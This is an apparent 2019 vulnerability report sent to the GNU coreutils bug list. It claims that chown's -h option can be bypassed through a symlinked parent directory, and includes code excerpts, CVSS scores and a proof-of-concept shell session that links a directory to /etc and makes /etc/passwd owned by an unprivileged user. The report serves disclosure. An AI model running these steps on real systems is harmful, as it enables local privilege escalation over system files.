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bug#35654: We've found a vulnerability of gnu chown, please check it and

From: st0n3 ss
Subject: bug#35654: We've found a vulnerability of gnu chown, please check it and request a cve id for us.
Date: Thu, 9 May 2019 23:53:11 +0800

Hello! we have found a vulnerability of command chown, please check it.If
it is a vulnerability. please request a cve id for use, thank you!chown -h

   - chown -h bypass
      - 1. Description
         - 1.1 Precondition:
         - 1.2 The Process of Attack:
      - 2. Code Analysis
      - 3. poc <>
      - 4. cvss3.0 score


In the user manual of command chown, the description of the -h option is as
follows. If we use command chown with -h option, only symbolic links will
be affected rather than any referenced file.

-h, --no-dereference affect symbolic links instead of any referenced file
(useful only on systems that can change the
ownership of a symlink)

But we found we can bypass the -h option to affected the referenced file.

The attacker already knows:

   - The user who has root permission will execute ‘chown’ to a specific
   file under one directory owned by a normal user who does not have root
   - The attacker can control that normal user.
   - The user who has root permission will change the owner or group user
   of that file to that normal user.

The Process of Attack:


   First, the attacker uses the permission of a normal user to create a
   symlink linked to a system directory, which is not owned by the normal
   user(For example, /etc or directory owned by the root user or wheel
   group) .

   Besides, the following requirement should be satisfied:
   - There’s a file under the referenced directory the having same name
      with the file that will be chowned by root permission user.

   Then, waitting for the user who has root permission to execute the
chown command.
   This will make the real file’s owner or group changed rather than the
   symlink. ( The attacker can also execute the chown command by himself if
   he can run the sudo or pkexec command set by the root user. )

Code Analysis


   First, chown.c will parse the parameters. The variable dereference is
   set to 0 if -hoption is given.

   /* chown.c */
           case 'h': /* --no-dereference: affect symlinks */
             dereference = 0;


   Then, chopt.affect_symlink_referent will be set as True if -h option is

   /* chown.c */
     chopt.affect_symlink_referent = (dereference != 0);


   Last, in file chown-core.c, the operator will affect the symlink itself
   if chopt.affect_symlink_referent is True and the target is a symlink.
   The target is a file rather than a symlink if attacker change the directory
   of the target file to a symbolic link which is linked to a directory . This
   is contrary to expectations! The file_stats becomes the state of the
   file under the referenced directory rather than the file under the symbolic
   link. (For example, in our poc, the file poc/passwd is not a symlink and
   the file_stats actually is the state of file /etc/passwd). Then, the
   file under the referenced directory’s owner will be changed.

   /* chown-core.c */
         /* If this is a symlink and we're dereferencing them,
            stat it to get info on the referent.  */
         if (chopt->affect_symlink_referent && S_ISLNK (file_stats->st_mode))
             if (fstatat (fts->fts_cwd_fd, file, &stat_buf, 0) != 0)
                 if (! chopt->force_silent)
                   error (0, errno, _("cannot dereference %s"),
                          quoteaf (file_full_name));
                 ok = false;

             file_stats = &stat_buf;

<>3. poc

First, there’s a directory /home/st0n3/chown_test owned by user st0n3.

address@hidden:~# ls -lahd /home/st0n3/chown_test
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:28 /home/st0n3/chown_test

The user root has a directory poc under directory /home/st0n3/chown_test,
and a file passwdunder directory poc.

address@hidden:~# ls -lahd /home/st0n3/chown_test/poc/
drwxr-xr-x 2 root root 4.0K May  9 13:29 /home/st0n3/chown_test/poc/
address@hidden:~# ls -lah /home/st0n3/chown_test/poc/passwd
-rw-r--r-- 1 root root 0 May  9 13:29 /home/st0n3/chown_test/poc/passwd

Now, the administrator wants user st0n3 has permission to change the owner
of /home/st0n3/chown_test/poc/passwd to st0n3.

According to 'only symbolic links will be affected rather than any
referenced file', the administrator assumes that chown -h st0n3 [some root
files under st0n3's directory]will only affect these file.

If the administrator set this ‘sudo rule’: st0n3 ALL=(root) NOPASSWD:
/bin/chown -h st0n3 /home/st0n3/chown_test/poc/passwd. As the manual of
command chown, user st0n3 only can change the owner of
/home/st0n3/chown_test/poc/passwd. If st0n3 change directory poc to a
symbolic link, the operator of user st0n3 still will not affect other root

# sudo -U st0n3 -l
Matching Defaults entries for st0n3 on e87d06a38f04:
    env_reset, mail_badpass,

User st0n3 may run the following commands on e87d06a38f04:
    (root) NOPASSWD: /bin/chown -h st0n3 /home/st0n3/chown_test/poc/passwd

But there is a vulnerability, user st0n3 can use this vulnerability to
change the owner of other root files. Let’s see it.

address@hidden:~/chown_test$ whoami
address@hidden:~/chown_test$ id
uid=1000(st0n3) gid=1000(st0n3) groups=1000(st0n3)
address@hidden:~/chown_test$ sudo -l
Matching Defaults entries for st0n3 on e87d06a38f04:
    env_reset, mail_badpass,

User st0n3 may run the following commands on e87d06a38f04:
    (root) NOPASSWD: /bin/chown -h st0n3 /home/st0n3/chown_test/poc/passwd
address@hidden:~/chown_test$ ls -lah
total 12K
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:28 .
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:28 ..
drwxr-xr-x 2 root  root  4.0K May  9 13:34 poc

address@hidden:~/chown_test$ mv poc/ poc1
address@hidden:~/chown_test$ ls -lah
total 12K
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:46 .
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:28 ..
drwxr-xr-x 2 root  root  4.0K May  9 13:34 poc1

address@hidden:~/chown_test$ ln -s /etc poc
address@hidden:~/chown_test$ ls -lah
total 12K
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:47 .
drwxr-xr-x 3 st0n3 st0n3 4.0K May  9 13:28 ..
lrwxrwxrwx 1 st0n3 st0n3    4 May  9 13:47 poc -> /etc
drwxr-xr-x 2 root  root  4.0K May  9 13:34 poc1
address@hidden:~/chown_test$ ls -lah /etc/passwd
-rw-r--r-- 1 root root 970 May  9 13:13 /etc/passwd
address@hidden:~/chown_test$ sudo /bin/chown -h st0n3
address@hidden:~/chown_test$ ls -lah /etc/passwd
-rw-r--r-- 1 st0n3 root 970 May  9 13:13 /etc/passwd

As you can see, the owner of file /etc/passwd has been changed to user st0n3
cvss3.0 score

if the attacker already can execute command chown by using sudo or pkexec
which is set by root permission user, the vector ‘UI’ is None. If there’s a
system file having the same name with the file will be chowned by root
permission user, the vector ‘C’,‘I’,‘H’ are all ‘High’. And the score of
cvss3.0 is 7.8;
7.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

if the attacker only knows when the root permission user will execute
command chown but cannot execute by himself, the vector ‘UI’ is ‘Required’.
In this case, the score is 7.3 .
7.3 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Attachment: chown_-h_bypass.md
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